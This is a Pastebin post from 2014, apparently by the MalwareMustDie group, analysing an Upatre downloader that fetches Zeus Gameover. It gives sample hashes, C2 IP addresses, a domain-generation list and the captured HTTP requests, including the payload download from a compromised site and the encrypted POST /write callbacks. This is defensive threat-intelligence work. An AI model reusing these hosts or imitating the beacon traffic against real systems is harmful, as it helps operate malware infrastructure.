SHARE
TWEET

Upatre downloading Zeus Gameover (GMO)

MalwareMustDie Mar 26th, 2014 486 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMusDie!
  2. // Case: Upatre downloading Zeus Gameover (GMO)
  3. // Detected new alive (front end) CNC in 192.210.237.212
  4. // @unixfreaxjp /malware/checkdomains]$ date
  5. Wed Mar 26 19:52:24 JST 2014
  6.  
  7. Upatre Sample: https://www.virustotal.com/en/file/1c3a24492f53fa16107f2ec01294bf188c32dc6c7a407a814b76685e4176a71a/analysis/1395828639/
  8. ZGMO sample: https://www.virustotal.com/en/file/e5270d906ef13a91e176cf60473747e5bf91bc60fe457dd0f3201a5f51cf6524/analysis/1395830427/
  9. ZGMO Polymorphic drop: https://www.virustotal.com/en/file/4f1f5242b6cf599220bcf642c7a3bd2f42739445bef5bf13b30c67ebbeeb5d64/analysis/1395830452/
  10. ZGMO Necurs rootkit: https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/
  11.  
  12. // Upatre downloads from  91.103.220.155
  13.  
  14. ( Wed Mar 26 19:26:33 JST 2014|91.103.220.155|no-dns.dataflame.co.uk.|29550 | 91.103.216.0/21 | SIMPLYTRANSIT | GB | DATAFLAME.CO.UK | DATAFLAME INTERNET SERVICES LTD )
  15.  
  16. GET /wp-content/uploads/2014/03/2103UKp.qta HTTP/1.1
  17. Accept: text/*, application/*
  18. User-Agent: Updates downloader
  19. Host: premiercrufinewine.co.uk
  20. Cache-Control: no-cache
  21.  
  22. HTTP/1.1 200 OK
  23. Date: Wed, 26 Mar 2014 09:57:22 GMT
  24. Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_qos/10.10
  25. Last-Modified: Fri, 21 Mar 2014 06:12:05 GMT
  26. ETag: "e1314-79e34-4f517c3d02e2a"
  27. Accept-Ranges: bytes
  28. Content-Length: 499252
  29. Content-Type: text/plain
  30.  
  31. ZZP.A. (REDACTED)
  32.  
  33. // ZGMO DGA:
  34.  
  35. hyvguwdisgtkfjvpzrshijmjmngu.info
  36. vsskfudeqsorzhhawghonhknp.ru
  37. zttwocyqkpdegqgiytvcxphhy.biz
  38. mftodqwheaiozkbzduwjzydwkonv.com
  39. pvdlcaxlflgavwmfzvgcqhafm.com
  40. swskvaylddwvkhursjhbyx.org
  41. rccicerggqhswvgwolryhvsgqwsxvs.net
  42. aulbbiwslxpvvphxnjij.biz
  43. uoxztdipjzppjdpyttxcjrdiz.ru
  44. zzgezdvwtwyhypfqhytcjraygqp.com
  45. gugquwcumizhgyibbaqobajfvolbh.info
  46.  
  47.  
  48. // ZGMO Callbacks ALIVE domains:
  49. aulbbiwslxpvvphxnjij.biz,50.116.4.71,  DNS1.REGISTRAR-SERVERS.COM
  50. mftodqwheaiozkbzduwjzydwkonv.com,192.210.237.212,DNS1.REGISTRAR-SERVERS.COM
  51.  
  52. // ZGMO Callbacks:
  53.  
  54. // callback 1 to 50.116.4.71
  55.  
  56. ( Wed Mar 26 19:24:28 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE )
  57.  
  58. POST /write HTTP/1.1
  59. Host: default
  60. Accept-Encoding:
  61. Connection: close
  62. Content-Length: 328
  63. X-ID: 5555
  64.  
  65. .3....l.u.\...v.Y%.kH.......U.v.a.V..\..Pb.%....e..
  66. .....'...'...Ve.F\e.E'b.2T`.AVe.G]g.4R..E#a.@Rl.A]e.
  67. f.................?.h.\N.......}.e.Xg...............
  68. Ud.E2..h.......!...!...io.vhj.vhU.vhU.vhU.vhU.vhU.vh
  69. U.vhk...............jo.Gk`.vk ..9E.vkm.............lW
  70. .|nU.vmU.qio.......'...'...nU.voT.vnU..jT..
  71. .U.voU.voU.voU.voU...U.
  72.  
  73. // callback 2 to 192.210.237.212
  74.  
  75. ( Wed Mar 26 19:25:04 JST 2014|192.210.237.212|host.colocrossing.com.|36352 | 192.210.236.0/22 | AS-COLOCROSSING | US | NWNX.NET | NEW WAVE NETCONNECT LLC )
  76.  
  77. POST /write HTTP/1.1
  78. Host: default
  79. Accept-Encoding:
  80. Connection: close
  81. Content-Length: 328
  82. X-ID: 5555
  83.  
  84. .uj......Z..Lp=..N.H..............r}.E..!J..F#re.......
  85. '...'...V...\...'...T...V...]...R...#...R...]..f.......
  86. .........:U.h.6.._...Z......g...............U...2..h...
  87. ....!...!...i...h...h...h...h...h...h...h...hk.........
  88. ......jih.k1..kf.Z9...km.............l...n...m...io....
  89. ...'...'...n...o...n..hj..t....o...o...o...o..t...
  90.  
  91.  
  92. #MalwareMstDie!!
RAW Paste Data
Top